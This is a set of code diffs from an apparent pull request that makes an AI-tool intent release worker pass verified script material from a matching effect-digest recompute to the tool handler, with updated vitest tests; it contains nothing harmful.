       'lifecycle_lookup_v1',
       { query: 42 },
       makeAuth(),
-      registry,
-      enabledStore(),
+      { registry, store: enabledStore() },
     ));
     expect(invalid.error).toMatch(/invalid input/i);
     expect(await executeTool(
       'lifecycle_lookup_v1',
       { query: 'hello' },
       makeAuth(),
-      registry,
-      enabledStore(),
+      { registry, store: enabledStore() },
     )).toBe('v1:hello');
 
     registry.activate(stage(
@@ -155,14 +153,13 @@ describe('extension route and AI lifecycle', () => {
       .toEqual({ version: 'v2' });
     expect(getToolDefinitions(registry).some((tool) => tool.name === 'lifecycle_lookup_v1'))
       .toBe(false);
-    await expect(executeTool('lifecycle_lookup_v1', {}, makeAuth(), registry, enabledStore()))
+    await expect(executeTool('lifecycle_lookup_v1', {}, makeAuth(), { registry, store: enabledStore() }))
       .rejects.toThrow(/unknown tool/i);
     expect(await executeTool(
       'lifecycle_lookup_v2',
       { query: 'new' },
       makeAuth(),
-      registry,
-      enabledStore(),
+      { registry, store: enabledStore() },
     )).toBe('v2:new');
 
     registry.withdraw('lifecycle-demo');
@@ -172,7 +169,7 @@ describe('extension route and AI lifecycle', () => {
     expect(getToolDefinitions(registry).some((tool) => tool.name === 'lifecycle_lookup_v2'))
       .toBe(false);
     expect(getToolTier('lifecycle_lookup_v2', registry)).toBeUndefined();
-    await expect(executeTool('lifecycle_lookup_v2', {}, makeAuth(), registry, enabledStore()))
+    await expect(executeTool('lifecycle_lookup_v2', {}, makeAuth(), { registry, store: enabledStore() }))
       .rejects.toThrow(/unknown tool/i);
   });
 
@@ -198,8 +195,7 @@ describe('extension route and AI lifecycle', () => {
       'lifecycle_lookup_v1',
       { query: 'old' },
       makeAuth(),
-      registry,
-      enabledStore(),
+      { registry, store: enabledStore() },
     );
     await started;
     registry.activate(stage(
@@ -215,8 +211,7 @@ describe('extension route and AI lifecycle', () => {
       'lifecycle_lookup_v1',
       { query: 'next' },
       makeAuth(),
-      registry,
-      enabledStore(),
+      { registry, store: enabledStore() },
     )).toBe('v2:next');
   });
 
@@ -242,8 +237,7 @@ describe('extension route and AI lifecycle', () => {
       'lifecycle_lookup_v1',
       { query: 'still-old' },
       makeAuth(),
-      registry,
-      enabledStore(),
+      { registry, store: enabledStore() },
     )).toBe('v1:still-old');
   });
 
@@ -271,8 +265,7 @@ describe('extension route and AI lifecycle', () => {
       'lifecycle_lookup_v1',
       { query: 'hello' },
       makeAuth(),
-      registry,
-      enabledStore(false),
+      { registry, store: enabledStore(false) },
     )).rejects.toThrow(/unknown tool/i);
 
     expect(handler).not.toHaveBeenCalled();
@@ -292,8 +285,7 @@ describe('extension route and AI lifecycle', () => {
       'lifecycle_lookup_v1',
       { query: 'hello' },
       makeAuth(),
-      registry,
-      enabledStore(true),
+      { registry, store: enabledStore(true) },
     )).toBe('ran');
     expect(handler).toHaveBeenCalledTimes(1);
   });
@@ -309,8 +301,7 @@ describe('extension route and AI lifecycle', () => {
       'get_device_details',
       { deviceId: 'not-a-uuid' },
       makeAuth(),
-      registry,
-      { isEnabled },
+      { registry, store: { isEnabled } },
     ));
 
     expect(result.error).toBeTruthy();

--- a/apps/api/src/jobs/intentReleaseWorker.test.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.test.ts
@@ -48,7 +48,7 @@ const { schema, dbState, intentServiceMock, actorContextMock, tenantStatusMock, 
       isHeadlessM365Tool: vi.fn(() => false),
       executeM365ToolHeadless: vi.fn(),
     },
-    // Task 7: computeEffectDigest itself is unit-tested in
+    // Task 7: the digest compute itself is unit-tested in
     // services/actionIntents/effectDigest.test.ts (the resolver map). Mocked
     // wholesale here, same treatment as buildAuthContextForIntent/
     // getActiveOrgTenant/checkToolPermission above — this file only needs to
@@ -58,10 +58,9 @@ const { schema, dbState, intentServiceMock, actorContextMock, tenantStatusMock, 
     effectDigestMock: {
       // The RELEASE-path compute (#3409 PR4c-1): returns the digest AND, for
       // run_script, the verified material the handler can execute from
-      // without re-reading. `computeEffectDigest` (the flattening `string |
-      // null` wrapper) still exists for other callers but the worker no
-      // longer uses it — the whole point is that the worker keeps what the
-      // recompute already resolved.
+      // without re-reading — the whole point being that the worker KEEPS what
+      // the recompute already resolved instead of taking a bare digest and
+      // letting the handler read the row a second time.
       computeEffectDigestForRelease: vi.fn(
         async () => ({ digest: null }) as { digest: string | null; context?: unknown },
       ),
@@ -205,7 +204,7 @@ vi.mock('bullmq', () => ({
 // ---------------------------------------------------------------------------
 
 import { releaseApprovedIntent, processIntentReleaseJob } from './intentReleaseWorker';
-// The mocked db handle the worker threads into computeEffectDigest — imported
+// The mocked db handle the worker threads into the digest recompute — imported
 // so that call can be asserted against the real object rather than
 // expect.anything().
 import { db as mockedDb } from '../db';
@@ -257,7 +256,7 @@ function baseIntent(overrides: Partial<ActionIntent> = {}): ActionIntent {
     errorCode: null,
     // Task 7: NULL by default (matches supervised intents and legacy/
     // unpinnable four_eyes intents) — the worker's effect-digest check
-    // short-circuits on null and never calls computeEffectDigest, so the
+    // short-circuits on null and never calls the digest recompute, so the
     // existing fixtures/tests above don't need to know effectDigest exists.
     // Tests that DO exercise the check override this explicitly.
     effectDigest: null,

--- a/apps/api/src/jobs/intentReleaseWorker.test.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.test.ts
@@ -56,7 +56,15 @@ const { schema, dbState, intentServiceMock, actorContextMock, tenantStatusMock, 
     // re-derive scripts/quotes/invoices table mocks it has no other reason
     // to know about.
     effectDigestMock: {
-      computeEffectDigest: vi.fn(async () => null as string | null),
+      // The RELEASE-path compute (#3409 PR4c-1): returns the digest AND, for
+      // run_script, the verified material the handler can execute from
+      // without re-reading. `computeEffectDigest` (the flattening `string |
+      // null` wrapper) still exists for other callers but the worker no
+      // longer uses it — the whole point is that the worker keeps what the
+      // recompute already resolved.
+      computeEffectDigestForRelease: vi.fn(
+        async () => ({ digest: null }) as { digest: string | null; context?: unknown },
+      ),
       // hasPinnedDigest is the SHARED "is a digest pinned on this intent?"
       // predicate both release paths must use (the worker here and the
       // inline chat path in services/aiAgentSdk.ts) — they previously
@@ -118,7 +126,7 @@ vi.mock('../services/actionIntents/actorContext', () => ({
   buildAuthContextForIntent: actorContextMock.buildAuthContextForIntent,
 }));
 vi.mock('../services/actionIntents/effectDigest', () => ({
-  computeEffectDigest: effectDigestMock.computeEffectDigest,
+  computeEffectDigestForRelease: effectDigestMock.computeEffectDigestForRelease,
   hasPinnedDigest: effectDigestMock.hasPinnedDigest,
 }));
 vi.mock('../services/tenantStatus', () => ({
@@ -339,7 +347,7 @@ describe('releaseApprovedIntent', () => {
     resetGoogleSecretActions();
     googleHeadlessMock.isHeadlessGoogleTool.mockReturnValue(false);
     m365HeadlessMock.isHeadlessM365Tool.mockReturnValue(false);
-    effectDigestMock.computeEffectDigest.mockResolvedValue(null);
+    effectDigestMock.computeEffectDigestForRelease.mockResolvedValue({ digest: null });
   });
 
   it('double delivery: CAS approved->executing returns false — exits without touching anything else', async () => {
@@ -764,7 +772,7 @@ describe('releaseApprovedIntent', () => {
     it('content_changed: recomputed digest no longer matches the stored one — fails before executeTool, audit records the code', async () => {
       const intent = baseIntent({ effectDigest: 'a'.repeat(64) });
       primeThroughRevalidation(intent);
-      effectDigestMock.computeEffectDigest.mockResolvedValueOnce('b'.repeat(64)); // drifted
+      effectDigestMock.computeEffectDigestForRelease.mockResolvedValueOnce({ digest: 'b'.repeat(64) }); // drifted
       intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> failed
 
       await releaseApprovedIntent(intent.id);
@@ -776,7 +784,7 @@ describe('releaseApprovedIntent', () => {
       // handle (or any truthy value) was threaded through — and a resolver
       // reading through a GUC-less handle silently returns zero rows, which
       // would fail EVERY pinned release as content_changed.
-      expect(effectDigestMock.computeEffectDigest).toHaveBeenCalledWith(
+      expect(effectDigestMock.computeEffectDigestForRelease).toHaveBeenCalledWith(
         intent.actionName,
         intent.arguments,
         mockedDb,
@@ -802,18 +810,71 @@ describe('releaseApprovedIntent', () => {
       const digest = 'c'.repeat(64);
       const intent = baseIntent({ effectDigest: digest });
       primeThroughRevalidation(intent);
-      effectDigestMock.computeEffectDigest.mockResolvedValueOnce(digest); // unchanged
+      effectDigestMock.computeEffectDigestForRelease.mockResolvedValueOnce({ digest }); // unchanged
       aiToolsMock.executeTool.mockResolvedValueOnce(JSON.stringify({ ok: true }));
       intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> completed
 
       await releaseApprovedIntent(intent.id);
 
+      // No verified material came back (this tool has no snapshot to carry),
+      // so the call stays at three arguments — unchanged for every non-
+      // run_script tool.
       expect(aiToolsMock.executeTool).toHaveBeenCalledWith(intent.actionName, intent.arguments, fakeAuth);
       expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
         intent.id,
         'executing',
         'completed',
         expect.anything(),
+      );
+    });
+
+    // #3409 PR4c-1: the recompute already read the script row and resolved the
+    // tenant variables. Handing that verified material to the handler is what
+    // closes the check/use window — a handler that re-reads can execute
+    // something the digest never saw.
+    it('hands the verified material from the matching recompute to executeTool as the execution context', async () => {
+      const digest = 'c'.repeat(64);
+      const intent = baseIntent({ effectDigest: digest });
+      primeThroughRevalidation(intent);
+      const verifiedRunScript = {
+        snapshot: { script: { id: 'script-1' } },
+        scriptRow: { id: 'script-1' },
+        scope: { orgIds: new Set(['org-1']) },
+      };
+      effectDigestMock.computeEffectDigestForRelease.mockResolvedValueOnce({
+        digest,
+        context: { verifiedRunScript },
+      });
+      aiToolsMock.executeTool.mockResolvedValueOnce(JSON.stringify({ ok: true }));
+      intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> completed
+
+      await releaseApprovedIntent(intent.id);
+
+      const call = aiToolsMock.executeTool.mock.calls[0]!;
+      expect(call.slice(0, 3)).toEqual([intent.actionName, intent.arguments, fakeAuth]);
+      // Identity, not shape: the handler must receive the very object the
+      // recompute resolved, not an equal-looking reconstruction.
+      expect((call[3] as { context?: { verifiedRunScript?: unknown } }).context?.verifiedRunScript)
+        .toBe(verifiedRunScript);
+    });
+
+    it('never executes — and never forwards the verified material — when the digest mismatches', async () => {
+      const intent = baseIntent({ effectDigest: 'a'.repeat(64) });
+      primeThroughRevalidation(intent);
+      effectDigestMock.computeEffectDigestForRelease.mockResolvedValueOnce({
+        digest: 'b'.repeat(64), // drifted
+        context: { verifiedRunScript: { snapshot: {}, scriptRow: {}, scope: {} } },
+      });
+      intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> failed
+
+      await releaseApprovedIntent(intent.id);
+
+      expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+      expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+        intent.id,
+        'executing',
+        'failed',
+        expect.objectContaining({ errorCode: 'content_changed' }),
       );
     });
 
@@ -830,7 +891,7 @@ describe('releaseApprovedIntent', () => {
       // services/aiAgentSdk.ts) is what made the two release paths behave
       // oppositely on an `undefined` effectDigest.
       expect(effectDigestMock.hasPinnedDigest).toHaveBeenCalledWith(intent);
-      expect(effectDigestMock.computeEffectDigest).not.toHaveBeenCalled();
+      expect(effectDigestMock.computeEffectDigestForRelease).not.toHaveBeenCalled();
       expect(aiToolsMock.executeTool).toHaveBeenCalled();
       expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
         intent.id,
@@ -851,7 +912,7 @@ describe('releaseApprovedIntent', () => {
       // since the failure happens strictly before execution.
       const intent = baseIntent({ effectDigest: 'd'.repeat(64) });
       primeThroughRevalidation(intent);
-      effectDigestMock.computeEffectDigest.mockRejectedValueOnce(new Error('connection terminated'));
+      effectDigestMock.computeEffectDigestForRelease.mockRejectedValueOnce(new Error('connection terminated'));
       intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> failed
 
       await expect(releaseApprovedIntent(intent.id)).resolves.toBeUndefined();
@@ -887,7 +948,7 @@ describe('releaseApprovedIntent', () => {
       // them would make a DB blip read as tampering.
       const intent = baseIntent({ effectDigest: 'e'.repeat(64) });
       primeThroughRevalidation(intent);
-      effectDigestMock.computeEffectDigest.mockResolvedValueOnce('f'.repeat(64));
+      effectDigestMock.computeEffectDigestForRelease.mockResolvedValueOnce({ digest: 'f'.repeat(64) });
       intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
 
       await releaseApprovedIntent(intent.id);
@@ -1130,7 +1191,7 @@ describe('secret-bearing release', () => {
     resetGoogleSecretActions();
     googleHeadlessMock.isHeadlessGoogleTool.mockReturnValue(false);
     m365HeadlessMock.isHeadlessM365Tool.mockReturnValue(false);
-    effectDigestMock.computeEffectDigest.mockResolvedValue(null);
+    effectDigestMock.computeEffectDigestForRelease.mockResolvedValue({ digest: null });
   });
 
   it('seals a google_reset_password credential instead of storing prose', async () => {

--- a/apps/api/src/jobs/intentReleaseWorker.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.ts
@@ -353,9 +353,17 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
   // ("possibly minutes to (for `mcp_api` intents) a day"). Do not restate the
   // chat numbers as if they were universal.
   //
-  // A pinned digest is ABSENT for supervised intents (never pinned) and for
-  // legacy/unpinnable four_eyes intents (no resolver existed, or the target
-  // didn't exist yet, at creation); both skip this check by design.
+  // A pinned digest is ABSENT only when no resolver existed for the intent's
+  // tool/action at creation (`not_applicable`), or a resolver existed but
+  // couldn't resolve the target (`unresolved` — legacy pre-pinning rows, or a
+  // missing/deleted target); both skip this check by design. Approval scope
+  // is NOT a factor: pinning is scope-independent (changed 2026-08-06, see
+  // effectDigest.ts's header) — a SUPERVISED intent whose tool has a
+  // resolver (run_script is the flagship case) IS pinned and DOES run this
+  // check below, same as a four_eyes intent. It used to be skipped for every
+  // supervised intent when pinning was gated on
+  // `approvalScope === 'four_eyes'`; that gate is gone — don't assume it's
+  // still there and conclude this branch is unreachable for supervised.
   // `hasPinnedDigest` is the SHARED predicate with the inline chat release
   // path (services/aiAgentSdk.ts): the two previously guarded the same
   // invariant with different predicates (`!== null` here, truthiness there),

--- a/apps/api/src/jobs/intentReleaseWorker.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.ts
@@ -9,7 +9,8 @@ import { writeAuditEvent, requestLikeFromSnapshot } from '../services/auditEvent
 import { recordActionIntentEvent, recordActionIntentMetric } from '../services/actionIntents/metrics';
 import { transitionIntent } from '../services/actionIntents/intentService';
 import { revalidateApprovedIntentForRelease } from '../services/actionIntents/revalidateRelease';
-import { computeEffectDigest, hasPinnedDigest } from '../services/actionIntents/effectDigest';
+import { computeEffectDigestForRelease, hasPinnedDigest } from '../services/actionIntents/effectDigest';
+import type { ToolExecutionContext } from '../services/toolExecutionContext';
 import { executeTool, requiresLiveSession } from '../services/aiTools';
 import { withAuthDbAccessContext } from '../middleware/auth';
 import { getToolTimeout, withToolTimeout } from '../services/toolTimeouts';
@@ -374,6 +375,14 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
   //
   // A pinned digest that no longer matches the freshly-recomputed one means
   // the target changed underneath the approval — fail closed, never execute.
+  //
+  // #3409 PR4c-1: the recompute below does not just produce a digest — for
+  // run_script it reads the script row and resolves the tenant variables. That
+  // work is CARRIED to executeTool as `verifiedContext` instead of being
+  // thrown away and redone inside the handler, because a second read reopens
+  // the very window this check just closed (the digest proves the target was
+  // unchanged AS OF THE READ; a later read proves nothing).
+  let verifiedContext: ToolExecutionContext | undefined;
   if (hasPinnedDigest(intent)) {
     // Runs in its own short system-scoped context (same discipline as Step 2
     // above) — this point in the function is between DB contexts (Step 2's
@@ -382,10 +391,10 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
     // would silently filter to zero rows rather than error on (see db/index.ts's
     // getCurrentDb). Without this wrap every resolver would read "not found"
     // and this check would fail EVERY pinned release, not just drifted ones.
-    let recomputedEffectDigest: string | null;
+    let recomputed: { digest: string | null; context?: ToolExecutionContext };
     try {
-      recomputedEffectDigest = await withSystemDbAccessContext(() =>
-        computeEffectDigest(intent.actionName, intent.arguments, db),
+      recomputed = await withSystemDbAccessContext(() =>
+        computeEffectDigestForRelease(intent.actionName, intent.arguments, db),
       );
     } catch (err) {
       // Fail closed with a categorized code, like every other step in this
@@ -413,10 +422,13 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
       });
       return;
     }
-    if (recomputedEffectDigest !== intent.effectDigest) {
+    if (recomputed.digest !== intent.effectDigest) {
       await failIntent(intent, 'content_changed', { details: { actionName: intent.actionName } });
       return;
     }
+    // Only a MATCHING digest licenses reuse: the material is what the approver
+    // approved. On a mismatch we returned above and nothing is carried.
+    verifiedContext = recomputed.context;
   }
 
   // Phase-1 deferral: the headless worker still cannot run session-aware M365
@@ -464,7 +476,13 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
         ? () => executeGoogleToolHeadless(intent.actionName, intent.arguments, intent.orgId)
         : isHeadlessM365Tool(intent.actionName)
         ? () => executeM365ToolHeadless(intent.actionName, intent.arguments, intent.orgId, intent.id)
-        : () => executeTool(intent.actionName, intent.arguments, auth);
+        : // The options bag is passed ONLY when something was actually
+          // verified, so every other release keeps the exact three-argument
+          // call it has always made.
+          () =>
+            verifiedContext
+              ? executeTool(intent.actionName, intent.arguments, auth, { context: verifiedContext })
+              : executeTool(intent.actionName, intent.arguments, auth);
       rawResult = await withToolTimeout(
         withAuthDbAccessContext(auth, invoke),
         getToolTimeout(intent.actionName),

--- a/apps/api/src/services/actionIntents/effectDigest.test.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.test.ts
@@ -3,7 +3,7 @@ import { beforeEach, describe, expect, it, vi } from 'vitest';
 import type { Database } from '../../db';
 import type { ResolvedVariable, TenantVariableScope } from '../tenantVariableResolution';
 import {
-  computeEffectDigest,
+  computeEffectDigestForRelease,
   computeEffectDigestOutcome,
   effectDigestResolverKey,
   hasPinnedDigest,
@@ -15,11 +15,14 @@ import {
  * `run_script`'s resolver now builds the verified snapshot
  * (`runScriptSnapshot.ts`), and that builder loads the tenant-variable scope
  * through `loadTenantVariableScope` — the single function in this file's
- * import graph that reaches the module-level `db` singleton. Everything else
- * in `tenantVariableResolution` (notably `resolveForOrg` / `unreadableForOrg`,
- * which the builder actually uses to shape the pinned references) is left
- * REAL by the `importOriginal` spread, so this stays a seam over the loader
- * rather than a mock of the resolution logic under test.
+ * import graph that needs real DB machinery. Its default path reads the
+ * module-level `db` singleton, and its `opts.database` path (the one the
+ * digest takes, Task 3b) asserts an already-open system-scoped context, which
+ * a unit test has none of. Everything else in `tenantVariableResolution`
+ * (notably `resolveForOrg` / `unreadableForOrg`, which the builder actually
+ * uses to shape the pinned references) is left REAL by the `importOriginal`
+ * spread, so this stays a seam over the loader rather than a mock of the
+ * resolution logic under test.
  *
  * The rest of the module's no-`vi.mock` stance is unchanged: every resolver
  * still runs against whatever fake `Database` the test hands it.
@@ -29,6 +32,24 @@ vi.mock('../tenantVariableResolution', async (importOriginal) => ({
   ...(await importOriginal<typeof import('../tenantVariableResolution')>()),
   loadTenantVariableScope: loadScope,
 }));
+
+/**
+ * The flattened `string | null` digest, through the LIVE release entry point.
+ *
+ * The module has exactly two entry points — `computeEffectDigestOutcome`
+ * (creation) and `computeEffectDigestForRelease` (both release paths) — and
+ * every resolver assertion below only cares about the digest half. Flattening
+ * once here keeps the resolver cases readable while still driving a function
+ * production actually calls; the `context` half is asserted separately, in the
+ * two release suites that consume it.
+ */
+async function digestFor(
+  toolName: string,
+  args: Record<string, unknown>,
+  database: Database,
+): Promise<string | null> {
+  return (await computeEffectDigestForRelease(toolName, args, database)).digest;
+}
 
 /**
  * Generic fake `Database`: every `.select(...).from(...).where(...)` chain
@@ -190,6 +211,23 @@ describe('computeEffectDigestOutcome', () => {
       expect(d1).toEqual(d2);
     });
 
+    // The CREATION path projects `verified` back off: it has no dispatch to
+    // feed and no business holding decrypted tenant plaintext one property
+    // access away. `toEqual` above cannot see the difference (extra keys on
+    // the received object are compared, but `verified` sits on the RESOLVER's
+    // result, not the outcome) — so pin the returned key set explicitly. A
+    // future change that lets the resolver's `verified` leak into the outcome
+    // fails here.
+    it('never returns the resolved material on the creation path', async () => {
+      loadScope.mockResolvedValueOnce(fakeScope([{ orgId: 'org-1' }]));
+      const outcome = await computeEffectDigestOutcome(
+        'run_script',
+        RUN_SCRIPT_ARGS,
+        runScriptDb(scriptRow()).database,
+      );
+      expect(Object.keys(outcome).sort()).toEqual(['digest', 'kind']);
+    });
+
     // FIX 4: `content` alone left run_as / language / timeout_seconds free to
     // change between approval and release with a byte-identical digest —
     // flipping run_as from `user` to `system` is a privilege escalation the
@@ -201,8 +239,8 @@ describe('computeEffectDigestOutcome', () => {
       ['timeoutSeconds', { timeoutSeconds: 9000 }],
       ['orgId', { orgId: 'org-2' }],
     ])('changes the digest when %s changes', async (_field, mutation) => {
-      const before = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
-      const after = await computeEffectDigest(
+      const before = await digestFor('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
+      const after = await digestFor(
         'run_script',
         RUN_SCRIPT_ARGS,
         runScriptDb(scriptRow(mutation)).database,
@@ -240,8 +278,8 @@ describe('computeEffectDigestOutcome', () => {
           },
         ]);
 
-      // Task 3b (#3409 PR4c-1): `digestOf` now records the exact `database`
-      // it handed `computeEffectDigest`, so the pinning test below can assert
+      // Task 3b (#3409 PR4c-1): `digestOf` records the exact `database` it
+      // handed the digest entry point, so the pinning test below can assert
       // `loadScope` (== `loadTenantVariableScope`) was called with THAT SAME
       // connection reused — not a second, freshly-escaped one.
       let lastDatabase: Database;
@@ -254,7 +292,7 @@ describe('computeEffectDigestOutcome', () => {
       ): Promise<string | null> {
         loadScope.mockResolvedValueOnce(scope);
         lastDatabase = runScriptDb(script, devices).database;
-        return computeEffectDigest(
+        return digestFor(
           'run_script',
           { scriptId: 'script-1', deviceIds: devices.map((d) => d.id) },
           lastDatabase,
@@ -346,7 +384,7 @@ describe('computeEffectDigestOutcome', () => {
             }),
           )
           .digest('hex');
-        const v2 = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
+        const v2 = await digestFor('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
         expect(v2).toMatch(/^[0-9a-f]{64}$/);
         expect(v2).not.toBe(v1);
       });
@@ -355,7 +393,7 @@ describe('computeEffectDigestOutcome', () => {
       // pay for a variable query at intent creation.
       it('loads no variable scope for a script that references none', async () => {
         const database = runScriptDb(scriptRow()).database;
-        const digest = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, database);
+        const digest = await digestFor('run_script', RUN_SCRIPT_ARGS, database);
         expect(digest).toMatch(/^[0-9a-f]{64}$/);
         expect(loadScope).toHaveBeenCalledWith([], { database });
       });
@@ -375,8 +413,8 @@ describe('computeEffectDigestOutcome', () => {
         [{ updatedAt }], // header untouched
         [{ id: 'line-1', quantity: '2', unitPrice: '10.00', lineTotal: '20.00', sortOrder: 0 }], // qty changed
       ]);
-      const digestBefore = await computeEffectDigest('manage_quotes', args, before.database);
-      const digestAfter = await computeEffectDigest('manage_quotes', args, after.database);
+      const digestBefore = await digestFor('manage_quotes', args, before.database);
+      const digestAfter = await digestFor('manage_quotes', args, after.database);
       expect(digestBefore).not.toBeNull();
       expect(digestBefore).not.toBe(digestAfter);
     });
@@ -401,18 +439,18 @@ describe('computeEffectDigestOutcome', () => {
     // effectDigestCoverage.contract.test.ts now makes impossible to repeat.
     it.each(['issue', 'void', 'record_payment'])('%s hashes the invoice updated_at', async (action) => {
       const { database } = makeFakeDb([[{ updatedAt: new Date('2026-08-01T00:00:00Z') }]]);
-      const result = await computeEffectDigest('manage_invoices', { action, invoiceId: 'inv-1' }, database);
+      const result = await digestFor('manage_invoices', { action, invoiceId: 'inv-1' }, database);
       expect(result).toMatch(/^[0-9a-f]{64}$/);
     });
 
     it('void detects a revision change between approval and release', async () => {
       const args = { action: 'void', invoiceId: 'inv-1' };
-      const before = await computeEffectDigest(
+      const before = await digestFor(
         'manage_invoices',
         args,
         makeFakeDb([[{ updatedAt: new Date('2026-08-01T00:00:00Z') }]]).database,
       );
-      const after = await computeEffectDigest(
+      const after = await digestFor(
         'manage_invoices',
         args,
         makeFakeDb([[{ updatedAt: new Date('2026-08-02T00:00:00Z') }]]).database,
@@ -425,7 +463,7 @@ describe('computeEffectDigestOutcome', () => {
         [{ invoiceId: 'inv-1' }], // invoice_payments lookup by paymentId
         [{ updatedAt: new Date('2026-08-01T00:00:00Z') }], // invoices lookup by invoiceId
       ]);
-      const result = await computeEffectDigest(
+      const result = await digestFor(
         'manage_invoices',
         { action: 'void_payment', paymentId: 'pay-1' },
         database,
@@ -459,7 +497,7 @@ describe('computeEffectDigestOutcome', () => {
   describe('manage_contracts', () => {
     it('activate hashes the contract updated_at', async () => {
       const { database } = makeFakeDb([[{ updatedAt: new Date('2026-08-01T00:00:00Z') }]]);
-      const result = await computeEffectDigest(
+      const result = await digestFor(
         'manage_contracts',
         { action: 'activate', contractId: 'contract-1' },
         database,
@@ -471,8 +509,8 @@ describe('computeEffectDigestOutcome', () => {
       const before = makeFakeDb([[{ updatedAt: new Date('2026-08-01T00:00:00Z') }]]);
       const after = makeFakeDb([[{ updatedAt: new Date('2026-08-02T00:00:00Z') }]]);
       const args = { action: 'cancel', contractId: 'contract-1' };
-      const digestBefore = await computeEffectDigest('manage_contracts', args, before.database);
-      const digestAfter = await computeEffectDigest('manage_contracts', args, after.database);
+      const digestBefore = await digestFor('manage_contracts', args, before.database);
+      const digestAfter = await digestFor('manage_contracts', args, after.database);
       expect(digestBefore).not.toBe(digestAfter);
     });
   });
@@ -480,7 +518,7 @@ describe('computeEffectDigestOutcome', () => {
   describe('manage_organizations:update_org', () => {
     it('hashes the current org status', async () => {
       const { database } = makeFakeDb([[{ status: 'active' }]]);
-      const result = await computeEffectDigest(
+      const result = await digestFor(
         'manage_organizations',
         { action: 'update_org', orgId: 'org-1', status: 'suspended' },
         database,
@@ -492,8 +530,8 @@ describe('computeEffectDigestOutcome', () => {
       const active = makeFakeDb([[{ status: 'active' }]]);
       const suspended = makeFakeDb([[{ status: 'suspended' }]]);
       const args = { action: 'update_org', orgId: 'org-1' };
-      const digestActive = await computeEffectDigest('manage_organizations', args, active.database);
-      const digestSuspended = await computeEffectDigest('manage_organizations', args, suspended.database);
+      const digestActive = await digestFor('manage_organizations', args, active.database);
+      const digestSuspended = await digestFor('manage_organizations', args, suspended.database);
       expect(digestActive).not.toBe(digestSuspended);
     });
 
@@ -511,17 +549,17 @@ describe('computeEffectDigestOutcome', () => {
   describe('manage_tickets:move_org', () => {
     it('pins the ticket org + status, not updated_at (comment churn must not trip it)', async () => {
       const args = { action: 'move_org', ticketId: 'ticket-1', targetOrgId: 'org-2' };
-      const before = await computeEffectDigest(
+      const before = await digestFor(
         'manage_tickets',
         args,
         makeFakeDb([[{ orgId: 'org-1', status: 'open' }]]).database,
       );
-      const sameAfterAComment = await computeEffectDigest(
+      const sameAfterAComment = await digestFor(
         'manage_tickets',
         args,
         makeFakeDb([[{ orgId: 'org-1', status: 'open' }]]).database,
       );
-      const afterSomeoneElseMovedIt = await computeEffectDigest(
+      const afterSomeoneElseMovedIt = await digestFor(
         'manage_tickets',
         args,
         makeFakeDb([[{ orgId: 'org-9', status: 'open' }]]).database,
@@ -546,12 +584,12 @@ describe('computeEffectDigestOutcome', () => {
   describe('execute_dr_plan', () => {
     it('pins the plan revision — a plan edited between approval and release changes the digest', async () => {
       const args = { planId: 'plan-1', executionType: 'failover' };
-      const before = await computeEffectDigest(
+      const before = await digestFor(
         'execute_dr_plan',
         args,
         makeFakeDb([[{ updatedAt: new Date('2026-08-01T00:00:00Z'), status: 'active' }]]).database,
       );
-      const after = await computeEffectDigest(
+      const after = await digestFor(
         'execute_dr_plan',
         args,
         makeFakeDb([[{ updatedAt: new Date('2026-08-02T00:00:00Z'), status: 'active' }]]).database,
@@ -575,17 +613,17 @@ describe('computeEffectDigestOutcome', () => {
     // keys on the tool's actual spelling, not a normalized one.
     it('pins the partner name + status via the snake_case tenant_id arg', async () => {
       const args = { tenant_id: 'partner-1', confirmation_phrase: 'delete Acme permanently' };
-      const before = await computeEffectDigest(
+      const before = await digestFor(
         'delete_tenant',
         args,
         makeFakeDb([[{ name: 'Acme', status: 'active' }]]).database,
       );
-      const afterRename = await computeEffectDigest(
+      const afterRename = await digestFor(
         'delete_tenant',
         args,
         makeFakeDb([[{ name: 'Acme Holdings', status: 'active' }]]).database,
       );
-      const afterChurn = await computeEffectDigest(
+      const afterChurn = await digestFor(
         'delete_tenant',
         args,
         makeFakeDb([[{ name: 'Acme', status: 'churned' }]]).database,
@@ -606,20 +644,54 @@ describe('computeEffectDigestOutcome', () => {
   });
 });
 
-describe('computeEffectDigest (flattening wrapper the release paths use)', () => {
+describe('computeEffectDigestForRelease (the shape both release paths consume)', () => {
   it('flattens BOTH unpinnable outcomes to null, which is what the stored column can express', async () => {
-    expect(await computeEffectDigest('list_scripts', {}, makeFakeDb([]).database)).toBeNull();
-    expect(await computeEffectDigest('run_script', {}, makeFakeDb([]).database)).toBeNull();
+    expect(await digestFor('list_scripts', {}, makeFakeDb([]).database)).toBeNull();
+    expect(await digestFor('run_script', {}, makeFakeDb([]).database)).toBeNull();
     // A genuine target_absent (not another missing_arg): well-formed args, no
     // script row. Both reasons still flatten to the same stored NULL.
     expect(
-      await computeEffectDigest('run_script', { ...RUN_SCRIPT_ARGS, scriptId: 'ghost' }, runScriptDb(null).database),
+      await digestFor('run_script', { ...RUN_SCRIPT_ARGS, scriptId: 'ghost' }, runScriptDb(null).database),
     ).toBeNull();
   });
 
   it('returns the digest itself on pinned', async () => {
